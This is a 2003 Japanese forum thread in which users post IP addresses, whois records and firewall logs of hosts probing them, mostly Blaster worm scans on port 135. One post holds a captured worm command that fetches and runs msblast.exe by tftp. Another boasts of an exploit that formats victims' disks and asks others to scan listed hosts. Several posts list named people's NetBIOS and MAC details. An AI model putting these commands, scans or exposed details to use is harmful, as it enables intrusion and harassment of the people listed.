172.145.221.66
172.157.234.118
209.187.115.88
218.176.200.33
172.137.219.7
24.81.13.115
218.176.201.10
218.176.200.92
625名無し!:03/07/28 08:50
>>615
TearDropってなに?
使ってみたけどよくわからん
62661.74.31.127:03/07/28 12:31
61.74.31.127
218.230.246.158
628???:03/07/28 18:49
私が作ったから凄いんだから♪

http://www3.free-city.net/home/akipon/page001.html

ピンク色だよ〜♪何がって?見ればわかるよ!

http://angely.h.fc2.com/page008.html
>>627
韓国からだね。
ソウルの・・・っ怖!!
これ以上は止める。

>>628
会社みたいだね。
会社名:ア○イ○○株式会社
責任者:○田 ○一
住所 :東京都豊島区
630629:03/07/30 08:42
>>627>>626
>>628>>627

でしたスマソ
631名無しさん@お腹いっぱい。:03/07/30 09:15
>>629
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク
632名無しさん@お腹いっぱい。:03/07/30 17:52
>>629
気になるよ
633名無しさん@お腹いっぱい。:03/07/30 23:27
age
Yahooの所持IPからアタック来たぞゴルァ
211.14.15.96
[ JPNIC & JPRS database provides information on network administration. Its ]
[ use is restricted to network administration purposes. For further infor- ]
[ mation, use 'whois -h whois.nic.ad.jp help'. To suppress Japanese output, ]
[ add'/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.14.12.0-211.14.15.0
b. [ネットワーク名] YAHOO-NET
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corp.
m. [運用責任者] IT018JP
n. [技術連絡担当者] IT018JP
p. [ネームサーバ] dnsg01.yahoo.co.jp/211.14.12.0-211.14.15.0
p. [ネームサーバ] dnsn201.yahoo.co.jp/211.14.12.0-211.14.15.0
y. [通知アドレス] [email protected]
[割当年月日] 2001/09/17
[返却年月日]
[最終更新] 2001/11/27 10:25:30 (JST)
[email protected]
635名無しさん@お腹いっぱい。:03/07/31 01:21
>>634
とっくに死滅したかと思っていたが、まだwhois得意になって貼る馬鹿が生き残ってるのか…
636_:03/07/31 01:23
637_:03/07/31 01:27
638名無しさん@お腹いっぱい。:03/07/31 01:28
あげ
夏だねぇ

IP取得しても、大した事は出来ないよ?
下のサイトで良い子の皆も頑張って勉強しようね。

http://www.nic.ad.jp/
あんちやふー
How To Become A Hacker
http://www.geocities.co.jp/SiliconValley/8474/index.html

*それとクラックは犯罪ですよ。
スーマリの改造でもしてなさいってこった?
>>639
んじゃてめーがフシアナしろよ
>>639
何気に親切だな(w
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ
644名無しさん@お腹いっぱい。:03/08/06 20:11
あげ
645名無しさん@お腹いっぱい。:03/08/06 20:49
age
646名無しさん@お腹いっぱい。:03/08/06 21:03
IP: 202.133.227.202
Node: AD
Group: WORKGROUP
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 000255D6D473
DNS: 202.133.227.main1.above.net.tw
647名無しさん@お腹いっぱい。:03/08/06 21:04
IP: 219.162.47.100
Node: タイガーウッズ
Group: WORKGROUP
NetBIOS: ADMINISTRATOR
MAC: 005345000000
DNS: p4100-ipbf29marunouchi.tokyo.ocn.ne.jp
648名無しさん@お腹いっぱい。:03/08/06 21:05
IP: 200.204.99.169
Node: ADMINISTRADOR
Group: QUASARPROD
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 00E04CDD38B7
DNS: 200-204-99-169.dsl.telesp.net.br
219.20.66.106
650名無しさん@お腹いっぱい。:03/08/07 22:22

inetnum: 202.123.128.0 - 202.123.159.255
netname: TALAYA2000
descr: IT&E OVERSEAS, INC.
descr: P.O. BOX 24881
descr: GMF
country: GU
admin-c: CT113-AP
tech-c: CT113-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-GU-TALAYA
changed: [email protected] 20000802
status: ALLOCATED PORTABLE
source: APNIC
651 :03/08/08 18:00
IPアドレス 218.123.72.195
ホスト名 YahooBB218123072195.bbtec.net
IPアドレス
割当国 ※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 xDSL
652名無しさん@お腹いっぱい。:03/08/09 12:24
24.157.141.78
からアクセスがきた。
こいつを不正アクセス禁止法で裁くには
どういう手続きをとればいいの?
653名無しさん@お腹いっぱい。:03/08/09 12:37
IPアドレス 24.157.141.78
ホスト名 CPE0060b07cfdb1-CM014200015522.cpe.net.cable.rogers.com
IPアドレス
 割当国 ※ カナダ (CA)

こいつをなんとか裁きたいのだが・・

654名無しさん@お腹いっぱい。:03/08/09 12:39
はかーのバカ共は原則処刑だな・・
DNS鯖をアタックだと勘違いしてるおばかさん達。
656名無しさん@お腹いっぱい。:03/08/09 12:50
>>655
ICPAに告訴するか・・
のぉ!
657名無しさん@お腹いっぱい。:03/08/09 12:55
>>655むふふ
658_:03/08/09 12:56
昨日はポート1177に来るんだけど俺だけか???
ああ、俺だ
1223.344.4944033.3234484.
662名無しさん@お腹いっぱい。:03/08/12 03:37
今、30秒おきくらいの頻度でport135をつつかれまくってるんだけど、何か始まってんの?
IPは、多すぎて書ききれまへん。(踏み台かも知れんけど)
663名無しさん@お腹いっぱい。:03/08/12 04:01
>>662
PC初心者板で再起動祭り発生中
これが原因かも↓
http://www.microsoft.com/japan/security/security_bulletins/ms03-026e.asp
664名無しさん@お腹いっぱい。:03/08/12 04:34
上のお陰で
もう4回ほど再起動した
また例のカウントダウンが始まるのだろうか…
>>664
135を塞ぐか、パッチDLしろ
666名無しさん@お腹いっぱい。:03/08/12 04:45

667_:03/08/12 04:46
668662:03/08/12 07:25
>>663
やっぱり他でも起こってるんですね…
ってか、これ↓みたいですね。
http://www.symantec.com/region/jp/sarcj/data/w/w32.blaster.worm.html
ついにトロイじゃなくてワームが出たんだ…

ちなみに、ルータにしてるマシンのiplogはこんな感じです。
まだまだ続きそう。
Aug 12 06:50:25 TCP: port 135 connection attempt from 218.226.225.164:1676
Aug 12 06:58:22 TCP: port 135 connection attempt from 218.226.227.56:1696
Aug 12 06:58:40 TCP: port 135 connection attempt from 66.75.218.112:2511
Aug 12 06:58:40 TCP: port 135 connection attempt from 218.226.186.13:4529
Aug 12 07:03:41 TCP: port 135 connection attempt from 218.226.221.53:2470
Aug 12 07:03:46 TCP: port 135 connection attempt from 218.226.220.216:2968
Aug 12 07:12:24 TCP: port 135 connection attempt from 218.226.211.219:4433
Aug 12 07:12:29 TCP: port 135 connection attempt from 218.226.217.107:4281
Aug 12 07:13:16 TCP: port 135 connection attempt from 218.226.225.198:1420
Aug 12 07:14:43 TCP: port 135 connection attempt from 218.226.220.216:1934
669GET! DVD:03/08/12 07:27
★☆ 夏休みは GETDVD で満喫・満喫!! ★☆★
★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★
☆★ 送料激安!  スピード発送!  商品豊富!   
★☆      http://www.get-dvd.com        
☆★ 激安DVDショップ 「GETDVDドットコム」 
★☆      http://www.get-dvd.com        
☆★ 今すぐアクセス Let’s Go・Go!!   
★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★
210.224.181.7様(さくらインターネット契約)、
あなたからは
telnet,finger,pop2,printer,squdup,uupc,whois,login,8080,nntp,execなど、
ありとあらゆるポートに攻撃を仕掛けてきているか、踏み台にされている可能性があります。
と思ったら勘違いでした。
謹んでお詫び申し上げます。
672名無しさん@お腹いっぱい。:03/08/12 11:51
Name: c113110.tctv.ne.jp
Address: 219.122.113.110
死んで詫びろ。馬鹿。
674名無しさん@お腹いっぱい。:03/08/12 12:23
IP: 61.207.116.252
DNS: p3252-ip01kokuryo.gunma.ocn.ne.jp
Node: 無邪気
NetBIOS: 一号機
Group: WORKGROUP
MAC: 005345000000
うちは135だけじゃなく、137も頻繁につつかれてる・・・
非常にうざい
Someone from www.hakusuisha.co.jp [219.109.220.132], port 3904 wants to connect to port 135 owned by 'Generic Host Process for Win32 Services' on your
677名無しさん@お腹いっぱい。:03/08/12 22:41
kitauze-


時間, イベント, 侵入者, カウント
03/08/12 23:20:50, MSRPC TCP port probe, kita145058.kitanet.ne.jp, 2
03/08/12 23:20:41, MSRPC TCP port probe, kita142252.kitanet.ne.jp, 3
03/08/12 23:19:36, MSRPC TCP port probe, kita137119.kitanet.ne.jp, 1
03/08/12 23:18:03, MSRPC TCP port probe, kita140054.kitanet.ne.jp, 2
03/08/12 23:17:49, MSRPC TCP port probe, kita141200.kitanet.ne.jp, 2
03/08/12 23:10:00, MSRPC TCP port probe, kita144117.kitanet.ne.jp, 2
03/08/12 23:08:46, MSRPC TCP port probe, kita142229.kitanet.ne.jp, 2
03/08/12 23:07:38, MSRPC TCP port probe, kita145001.kitanet.ne.jp, 1
03/08/12 23:06:57, MSRPC TCP port probe, kita144134.kitanet.ne.jp, 2
03/08/12 22:57:25, MSRPC TCP port probe, kita142172.kitanet.ne.jp, 1
03/08/12 16:42:07, MSRPC TCP port probe, kita144225.kitanet.ne.jp, 4
03/08/12 16:37:37, MSRPC TCP port probe, kita143022.kitanet.ne.jp, 2
03/08/12 16:31:34, MSRPC TCP port probe, kita145058.kitanet.ne.jp, 1
03/08/12 16:28:03, MSRPC TCP port probe, kita141151.kitanet.ne.jp, 1
03/08/12 16:26:55, MSRPC TCP port probe, kita143154.kitanet.ne.jp, 1
03/08/12 16:25:38, MSRPC TCP port probe, kita142031.kitanet.ne.jp, 1
03/08/12 16:25:25, MSRPC TCP port probe, kita141197.kitanet.ne.jp, 1
03/08/12 16:25:01, MSRPC TCP port probe, kita141109.kitanet.ne.jp, 3
03/08/12 16:22:42, MSRPC TCP port probe, kita143055.kitanet.ne.jp, 2
03/08/12 16:18:26, MSRPC TCP port probe, kita144208.kitanet.ne.jp, 1
03/08/12 16:17:21, MSRPC TCP port probe, kita141088.kitanet.ne.jp, 2
03/08/12 16:17:20, MSRPC TCP port probe, kita143076.kitanet.ne.jp, 1
03/08/12 16:11:13, MSRPC TCP port probe, kita143115.kitanet.ne.jp, 2
03/08/12 16:10:56, MSRPC TCP port probe, kita141201.kitanet.ne.jp, 2
03/08/12 15:53:20, MSRPC TCP port probe, kita143004.kitanet.ne.jp, 1
678名無しさん@お腹いっぱい。:03/08/12 22:47
135より137のほうが多くない?
それとntoskrnl.exeって何?
てst
680名無しさん@お腹いっぱい。:03/08/12 23:43
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.111.128.0-219.111.191.0
b. [ネットワーク名] SO-NET
f. [組織名] SO-Net サービス
g. [Organization] SO-Net Service
m. [運用責任者] MK2734JP
n. [技術連絡担当者] SW314JP
n. [技術連絡担当者] YY1426JP
p. [ネームサーバ] dnss3.so-net.ne.jp
p. [ネームサーバ] dnss4.so-net.ne.jp
p. [ネームサーバ] dnss5.so-net.ne.jp
p. [ネームサーバ] dnss6.so-net.ne.jp
p. [ネームサーバ] dnss7.so-net.ne.jp
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
[割当年月日] 2002/08/09
[返却年月日]
[最終更新] 2003/08/12 15:32:15 (JST)
[email protected]
>>678
WinNTを起動する際に必要なファイルの1つだよ
結構重要なファイルなんだけど・・・・もしかして、やられた?
682名無しさん@お腹いっぱい。:03/08/13 00:33
>>681
やられたのかは分からないけど、GUi%GUICONFIG#SRULE@ADVRULECONFIG#NORMAL_105
とかって、送信しようとしてるけど何で?
本日2度目
こっちにも晒し

IP Address:211.120.164.129
Network:Ikeda Multi Media Co.Ltd
Location:Ikeda. Japan
Node Name:zapd378a481.zaq.ne.jp
>>682
あまり詳しくないのでチカラになれません、ごめんね
でも、普通送信したりする必要のないファイルだから
ちょっとアヤシイんじゃないかなぁ
詳しい人、Help求む
2003/08/13 4:33:11通信の要求64.71.177.66TCP(1199)
2003/08/13 4:31:11通信の要求64.71.177.66TCP(1199)
2003/08/13 4:29:11通信の要求64.71.177.66TCP(1199)
2003/08/13 4:27:11通信の要求64.71.177.66TCP(1199)
2003/08/13 4:25:11通信の要求64.71.177.66TCP(1199)
2003/08/13 4:23:11通信の要求64.71.177.66TCP(1199)
2003/08/13 4:21:11通信の要求64.71.177.66TCP(1199)
2003/08/13 4:19:11通信の要求64.71.177.66TCP(1199)

誰か殺して
name: www.hakusuisha.co.jp
Address: 219.109.220.132

tcp135番への攻撃。
687名無しさん@お腹いっぱい。:03/08/13 22:52
キバseven アタックがうざい。氏ね。ったく。プロクシ変えてもかわんねえ。
なんでだ?
>686
それwin2000だね
>>686
Blastertだろ。
690@@@@@:03/08/14 03:43
☆★☆★ 海外サイトだから安心無修正 ★☆★☆
http://upbbs.s2.x-beat.com/linkvp/linkvp.html
☆★☆★ 本気汁丸出しのお○○こが! ★☆★☆
http://upbbs.s2.x-beat.com/linkvp/linkvp.html
☆★☆★ 2日間無料丸見え体験実施中 ★☆★☆
http://upbbs.s2.x-beat.com/linkvp/linkvp.html

 ↑ ↑ ↑
これって2日間ダウンロードしまくって
そのあと解約すれば全然タダじゃん?
691名無しさん@お腹いっぱい。:03/08/14 05:26
210.138.60.216
>>394でもガイシュツの様だがUZEEEEEEEEEEEEEEEEEEEEEEEEEE

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.138.60.0
b. [ネットワーク名] IIJNET
f. [組織名] IIJ インターネット
g. [Organization] IIJ Internet
m. [運用責任者] TM003JP
n. [技術連絡担当者] JY018JP
p. [ネームサーバ] dns-b.iij.ad.jp
p. [ネームサーバ] dns-c.iij.ad.jp
y. [通知アドレス] [email protected]
プロバのwhoisを晒すヤシが理解できない
何か意味があるのだろうか
693名無しさん@お腹いっぱい。:03/08/14 08:14
>>692
同意。
次は、スレタイ変えたほうがいいね。
694名無しさん@お腹いっぱい。:03/08/14 09:49
はっきりいっとくが
ここにIPさらしてるやつほうが馬鹿だからな
だいち個人を狙うハカーなぞそうそういない
このスレで警察のIPとか軍のIP晒してる馬鹿がいるかもしれない
そしてこのスレを見たハカー気取りがそのIPに攻撃始めるかもしれない
迷惑極まりない
695名無しさん@お腹いっぱい。:03/08/14 10:29
そうそういないけど、個人のサーバーがspamの踏み台に使われてるのはかなり迷惑
696名無しさん@お腹いっぱい。:03/08/14 11:33
192.168.1.11
whoisでも逆引き出来ないのだけど、かなり凶悪なクラッカーかな?
>>696
ここは釣り堀じゃないんですが。
>>696
whoisすると
Samba_Mitiko.home.linuxでした
699名無しさん@お腹いっぱい。:03/08/14 17:44
61.121.100.27
61.121.100.20
>>696
漏れはcorega.homeでした
61.197.60.71[pl327.nas921.akita.nttpc.ne.jp]
いいかげんうざいです。早く死んでください。
702名無しさん@お腹いっぱい。:03/08/15 17:12
202.229.198.199:80
未使用ポート遮断機能が通信を遮断しました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 211.108.51.147,epmap(135)

最近こういうの多すぎ。135ポートばっかり狙ってる。
704名無しさん@編集中:03/08/15 22:28
IPアドレス 24.79.161.91
ホスト名 h24-79-161-91.wp.shawcable.net
705山崎 渉:03/08/15 22:28
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン
706名無しさん@お腹いっぱい。:03/08/16 02:14
IP: 61.205.186.155
DNS: zaq3dcdba9b.zaq.ne.jp
Node: VAIO上村
Group: WORKGROUP
NetBIOS: ADMINISTRATOR
MAC: 00104BA1AC0F
707名無しさん@お腹いっぱい。:03/08/16 02:15
IP: 61.205.168.248
Node: KAPPA3
Group: (有)なつき
NetBIOS: __MSBROWSE__
MAC: 000A7905EB26
DNS: zaq3dcda8f8.zaq.ne.jp
708名無しさん@お腹いっぱい。:03/08/16 02:18
IP: 219.162.27.248
Node: スーパーけんた
NetBIOS: OWNER
Group: DATA
MAC: 005345000000
DNS: p6248-ip02niigatani.niigata.ocn.ne.jp
709名無しさん@お腹いっぱい。:03/08/16 04:29
24.34.138.183[h00010323315e.ne.client2.attbi.com]
今日は2回もトロイの攻撃があったよ。
しかもね、一回目は米国で二回目は英語わからないから
国名読めなかったけどヨーロッパだったよ。
毎日最低1回はトロイの警告が出るのはなんでだろう?
しかも全部国内じゃなくて外国だよ。
毎日攻撃されてちゃ身が持たないよ。(´Д⊂グスン
710名無しさん@お腹いっぱい。:03/08/16 12:44
TCP SYN FLOOD 64.246.54.70 2003/08/15 16:50:46 - 2003/08/15 17:01:39 11hit
ポートスキャン 64.246.54.70 2003/08/15 16:54:37 - 2003/08/15 16:57:46 8hit
711名無しさん@お腹いっぱい。:03/08/16 15:44
219.53.92.20 ウザすぎ!!
>>685
恥晒すな
それはpc.2ch.net
219.162.120.149
こいつうぜえ
714port 4444:03/08/17 22:48
こんなん来ました。ブラスター系

## client addr=61.13.57.225, port=55570
## hostname : c225.h061013057.is.net.tw
Location: +0 +4 +8 +C /0123456789ABCDEF
00000000: 74667470 202d6920 36312e31 332e3537 /tftp -i 61.13.57
00000010: 2e323235 20474554 206d7362 6c617374 /.225 GET msblast
00000020: 2e657865 0a /.exe.
Location: +0 +4 +8 +C /0123456789ABCDEF
00000000: 73746172 74206d73 626c6173 742e6578 /start msblast.ex
00000010: 650a /e.
Location: +0 +4 +8 +C /0123456789ABCDEF
00000000: 6d73626c 6173742e 6578650a /msblast.exe.
715714:03/08/17 22:49
あらら、崩れまくり。。。
みんなどの解析結果サラ支店の?
ルーター?FW?
うちっとこのFWコピペできなくて不便
717714:03/08/17 22:58
FWにport 135,4444を待ち受ける偽サーバを置いておくと
コネクトしてくるので面白い。
7181:03/08/17 23:00
アタッカーのIPを晒すとかってスレを立てておくと
馬鹿が書き込んでくるので面白い。
719714:03/08/17 23:07
確かに。>>1のような八が沢山いて面白い。
私はここに書き込んでいる方々のようにアタッカーのIPを調べる方法を知りません。
FWのログに残っているのは踏み台やウイルスに感染したコンピュータのIPばかりです。
アタッカーのIPを調べたいので私にも調べ方を教えてください。
>>720
> 私はここに書き込んでいる方々のようにアタッカーのIPを調べる方法を知りません。
アタッカーじゃなくて、ほとんどはゴミバケツなんだけどね
722名無しさん@お腹いっぱい。:03/08/19 01:00
p6177-ipad02osakakita.osaka.ocn.ne.jp
こいつうざいからピング10時間ぐらいしてます
( ´_ゝ`)フーン
N.Koreaからトロイの攻撃来襲記念ぱぴぽ

IP: 211.229.14.227
Network:POHANG NODE
Location:Pohang Korea
netname:KORNET-XDSL-POHANG.KR
descr:POHANG NODE
descr:135-19 DAEDODONG NAMKU POHANGSI
descr:KYONGBUG
descr:790-140
country:KR
admin-c:GP1604-KR
725724:03/08/19 03:48
ノートンのvisual trackingではN.KOREAだったけど
地図見たら韓国だった。失礼ヲバ。
726名無しさん@お腹いっぱい。:03/08/19 08:29
昨夜あたりから、やたらこんなのが来てるんですが 亜種関係ですか?
それか串サイトでもアドレス晒されたのかと思うのですが。
68.161.126.225 - - [19/Aug/2003:07:49:01 +0000] "GET / HTTP/1.1" 200 921 "-" "Mo
zilla/4.0 (compatible; MSIE 5.5; Windows 98)"
61.144.248.165 - - [19/Aug/2003:07:58:51 +0000] "GET / HTTP/1.1" 200 921 "-" "Mo
zilla/4.0 (compatible; MSIE 5.5; Windows 98)"
61.240.246.65 - - [19/Aug/2003:08:08:11 +0000] "GET / HTTP/1.1" 200 921 "-" "Moz
illa/4.0 (compatible; MSIE 5.5; Windows 98)"
211.186.104.192 - - [19/Aug/2003:08:14:48 +0000] "GET / HTTP/1.1" 200 921 "-" "M
ozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
207.172.46.73 - - [19/Aug/2003:08:16:57 +0000] "GET / HTTP/1.1" 200 921 "-" "Moz
illa/4.0 (compatible; MSIE 5.5; Windows 98)"

昨夜よりも前には、ほとんどこんなログは無かったのですがどうですか?
教えてください
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.148.128.0-210.148.135.0
b. [ネットワーク名] PPP-EXCITE
f. [組織名] エキサイト株式会社
g. [Organization] Excite Japan Co., Ltd.
m. [運用責任者] EK861JP
n. [技術連絡担当者] JF254JP
p. [ネームサーバ] ns00.cdn-japan.com
p. [ネームサーバ] ns01.cdn-japan.com
y. [通知アドレス] [email protected]
[割当年月日] 2002/07/19
[返却年月日]
[最終更新] 2003/07/24 15:26:06 (JST)
[email protected]
728名無しさん@お腹いっぱい。:03/08/19 22:20
IP: 219.164.19.225
Node: 島徹彰
Group: WORKGROUP
NetBIOS: 島徹彰1
MAC: 444553547777
DNS: m019225.ap.plala.or.jp
729名無しさん@お腹いっぱい。:03/08/19 22:20
IP: 220.97.224.208
Node: 大東園
Group: WORKGROUP
NetBIOS: WORKGROUP
MAC: 444553547777
DNS: p2208-ipbf08fukuokachu.fukuoka.ocn.ne.jp
730名無しさん@お腹いっぱい。:03/08/19 22:21
IP: 220.97.36.78
Node: 水野
Group: FORTUNE
NetBIOS: 水野1
MAC: 005345000000
DNS: p3078-ipad71marunouchi.tokyo.ocn.ne.jp
731名無しさん@お腹いっぱい。:03/08/19 22:21
IP: 219.162.170.198
Node: 三高商運
Group: WORKGROUP
NetBIOS: ADMINISTRATOR
MAC: 444553547777
DNS: p5198-ipad25osakakita.osaka.ocn.ne.jp
732名無しさん@お腹いっぱい。:03/08/19 22:22
IP: 218.43.212.191
Node: 岐阜営業所
Group: WORKGROUP
NetBIOS: WORKGROUP
MAC: 444553547777
DNS: p1191-ipad02gifu.gifu.ocn.ne.jp

733名無しさん@お腹いっぱい。:03/08/20 03:08
IPを晒すのって法的に問題ないの?
逮捕された人が、晒してある踏み台を使った場合とか。
誰か詳しい人教えてください。
734名無しさん@お腹いっぱい。:03/08/20 03:13
踏み台にされる側にも問題があるわけだが、
晒すことには問題ありそうだな。
それに晒されてるIPはほとんど
ウイルス感染してるマシンであり
ウイルスが勝手にアタックしているものが
大半を占めていると思うに一票
>>734
初耳です、jpnicは違法ですか?
さらされて困るIPなら そもそも不用意に無許可でアクセスするほうが悪くないか?
勝手にアクセスしてきたIPに気遣か?
>>733
問題ないです。

今日自分の家に、だれだれと名乗る、どこどこの方から来ましたと名乗る
訪問者がいて、そのことを公表するなというほうがおかしい。

別にこちからか募集して訪問したことの秘密を守るとか公言しているわけではないだろ。
738名無しさん@お腹いっぱい。:03/08/21 22:06

03.8.21 22:03:01拒否不明135TCP220.145.235.224ntfksm032224.fksm.nt.adsl.ppp.infoweb.ne.jp
03.8.21 22:03:00拒否不明135TCP220.145.235.224ntfksm032224.fksm.nt.adsl.ppp.infoweb.ne.jp
03.8.21 22:02:34拒否不明135TCP220.144.176.143fla1aao143.myg.mesh.ad.jp
03.8.21 22:02:33拒否不明135TCP220.144.176.143fla1aao143.myg.mesh.ad.jp
03.8.21 22:00:36拒否不明135TCP220.145.240.53nttcgi031053.tcgi.nt.adsl.ppp.infoweb.ne.jp
03.8.21 22:00:29拒否不明135TCP220.145.240.53nttcgi031053.tcgi.nt.adsl.ppp.infoweb.ne.jp
03.8.21 21:59:54拒否不明135TCP220.145.162.51kihn008051.catv.ppp.infoweb.ne.jp
03.8.21 21:59:11拒否不明135TCP220.145.107.192nttcgi034192.tcgi.nt.adsl.ppp.infoweb.ne.jp
03.8.21 21:59:04拒否不明135TCP220.145.107.192nttcgi034192.tcgi.nt.adsl.ppp.infoweb.ne.jp
03.8.21 21:58:45拒否不明135TCP220.145.44.54ntnigt037054.nigt.nt.adsl.ppp.infoweb.ne.jp
03.8.21 21:58:44拒否不明135TCP220.145.44.54ntnigt037054.nigt.nt.adsl.ppp.infoweb.ne.jp
03.8.21 21:54:34拒否不明135TCP220.145.94.221
ここでIPアドレス晒しても意味無いのは確かだが。
自分でISPに言えよ。
>739
イヤ、漏レが改良したEXPLOITで、次回起動時フォーマットするヂョ!.bat流し込んでレジストリ
改変しとくから大丈夫。

それより、誰か上のリストのリモホ宛てport135でスキャヌしてopenしてるヤシだけログ貼り出してクレ。頼んだゾ!
>>733
不正アクセスしてくる方が悪い。
742名無しさん@お腹いっぱい。:03/08/22 00:12
2003/08/22 0:06:16通信の要求211.10.246.146TCP(1038)
2003/08/22 0:04:16通信の要求211.10.246.146TCP(1038)
2003/08/22 0:02:56通信の要求206.112.112.5TCP(1089)
2003/08/22 0:02:16通信の要求211.10.246.146TCP(1038)
2003/08/22 0:01:39通信の要求211.10.246.154TCP(1039)
2003/08/22 0:00:57通信の要求206.112.112.5TCP(1089)
2003/08/22 0:00:16通信の要求211.10.246.146TCP(1038)
2003/08/21 23:59:39通信の要求211.10.246.154TCP(1039)
2003/08/21 23:58:57通信の要求206.112.112.5TCP(1089)
2003/08/21 23:58:16通信の要求211.10.246.146TCP(1038)
2003/08/21 23:57:39通信の要求211.10.246.154TCP(1039)
>>742
感染してる・・・と書いてみるテスト
ここ数日、icmp echoリクエストがいろんな所から大量に届いている(一分間に10〜100前後)のですが、
これは一体なんでしょうか? 

↓ちなみについさっきのログ
00:18:49.521813 xxx-51-52-181.nrp1feld.roc.ny.frontiernet.net > xxx.xxx.xxx.xxx: icmp: echo request
00:19:01.018292 xxx.128.153.146 > xxx.xxx.xxx.xxx: icmp: echo request
00:19:01.467896 xxx.25.145.45 > xxx.xxx.xxx.xxx: icmp: echo request
00:19:11.606740 xxxl-151-205-121-174.ny325.east.verizon.net > xxx.xxx.xxx.xxx: icmp: echo request
00:19:19.372920 xxxitm065021.sitm.nt.adsl.ppp.infoweb.ne.jp > xxx.xxx.xxx.xxx: icmp: echo request
00:20:25.440436 xxx.191.13.174 > xxx.xxx.xxx.xxx: icmp: echo request
00:21:55.131985 xxxich014077.aich.nt.isdn.ppp.infoweb.ne.jp > xxx.xxx.xxx.xxx: icmp: echo request
>>744
聞くところに因るとblaster.Dのせいらしいです。

でも実は、本日密かに開催されてる全国スキャン祭りの一環だと私は睨んでますが。
>>745
「全国」って日本全国ですか?エクアドルとかザンビアとかからもきてるんで、そっちじゃないとは
おもいますが…
無羅星Dってたんに135をつつくだけかと思ったらICMPもつつくんですね。勉強になりました。
ありがとうございました。
ちなみにicmp echo reqは特別な場合以外は全てルーターではじいているのでうちは無問題です。
ちなみに、一応リクエストしたノードに対してはhostアンリーチブルを返すようにしてますが、
これは無駄でしょうか?
747746:03/08/22 00:46
あーでもこういう逆引き不可な似たようなアドレスのが殆ど同時に連続してくるってのも怪しい気がするな…

00:41:23.859785 61.128.175.207 > xxx.xxx.xxx.xxx: icmp: echo request
00:41:43.520952 61.144.83.115 > xxx.xxx.xxx.xxx: icmp: echo request
00:42:31.201191 61.128.210.219 > xxx.xxx.xxx.xxx: icmp: echo request
00:42:31.962711 61.241.149.131 > xxx.xxx.xxx.xxx: icmp: echo request
00:42:37.387965 61.174.160.13 > xxx.xxx.xxx.xxx: icmp: echo request
00:43:03.775087 61.128.193.203 > xxx.xxx.xxx.xxx: icmp: echo request
748745:03/08/22 00:50
>>746
イヤ、今回は海外の招待選手も居るらしいです。

どうなんでしょう。。>hostアンリーチブル
まぁ、blast.Dさんがアンリーチブルをちゃんと認識して「ヤーメタ、次逝コ!」くれるように書かれて居れば
別ですが。
749名無しさん@お腹いっぱい。:03/08/22 00:53
>>743
何に感染しているの?
750746:03/08/22 00:58
>>748
なるほでぉ。
いつも寝る前はルーターをシャットダウンしているんですが、今夜はつけっぱなしにして
フィルターにムフフな設定をして、cronとかにもムフフなことを書き込んでやりますた。
明日の朝ログを見るのが楽しみ。便乗さん、いらっしゃい〜
751名無しさん@お腹いっぱい。:03/08/22 02:13
ttp://ip.tosp.co.jp/i.asp?i=MOONtoSTAR
アタッカーって・・・こんな人達ですか?
FLA1Aae054.smn.mesh.ad.jp
NCCa1Aac194.myg.mesh.ad.jp
753名無しさん@お腹いっぱい。:03/08/23 06:54
ここでIPを干している香具師は、勘違いしてないか?
日付: 2003/08/23 時刻: 6:58:27
アドレス 213.6.52.26 からの不正侵入の試みを規則 Backdoor/SubSeven トロイの木馬のデフォルト遮断 によって検出しました。
以降のアクセスを 30 分間遮断しました。
755殺していいよ:03/08/23 14:43
2003/08/23 14:35:17通信の要求211.10.246.144TCP(1302)
2003/08/23 14:33:17通信の要求211.10.246.144TCP(1302)
2003/08/23 14:33:01通信の要求211.10.246.160TCP(1293)
2003/08/23 14:31:17通信の要求211.10.246.144TCP(1302)
2003/08/23 14:31:01通信の要求211.10.246.160TCP(1293)
2003/08/23 14:29:17通信の要求211.10.246.144TCP(1302)
2003/08/23 14:29:01通信の要求211.10.246.160TCP(1293)
2003/08/23 14:27:17通信の要求211.10.246.144TCP(1302)
2003/08/23 14:27:01通信の要求211.10.246.160TCP(1293)
2003/08/23 14:25:17通信の要求211.10.246.144TCP(1302)
2003/08/23 14:25:01通信の要求211.10.246.160TCP(1293)
2003/08/23 14:24:01通信の要求211.10.246.146TCP(1234)
2003/08/23 14:23:17通信の要求211.10.246.144TCP(1302)
2003/08/23 14:23:01通信の要求211.10.246.160TCP(1293)
2003/08/23 14:22:01通信の要求211.10.246.146TCP(1234)
2003/08/23 14:20:01通信の要求211.10.246.146TCP(1234)
2003/08/23 14:18:01通信の要求211.10.246.146TCP(1234)
2003/08/23 14:16:01通信の要求211.10.246.146TCP(1234)
2003/08/23 14:14:01通信の要求211.10.246.146TCP(1234)
2003/08/23 14:12:02通信の要求211.10.246.146TCP(1234)
>>755
そこから本気でアタックされたら君はひとたまりもないよ
俺ならISPとNIC変える
漏れだったらLANケーブル抜いて寝る(w
さきほどマイクロソフトからでした(トロイ)
65.54.240.61

OrgName: Microsoft Corp
OrgID: MSFT
Address: One Microsoft Way
City: Redmond
StateProv: WA
PostalCode: 98052
Country: US

NetRange: 65.52.0.0 - 65.55.255.255
CIDR: 65.52.0.0/14
NetName: MICROSOFT-1BLK
NetHandle: NET-65-52-0-0-1
Parent: NET-65-0-0-0-0
NetType: Direct Assignment
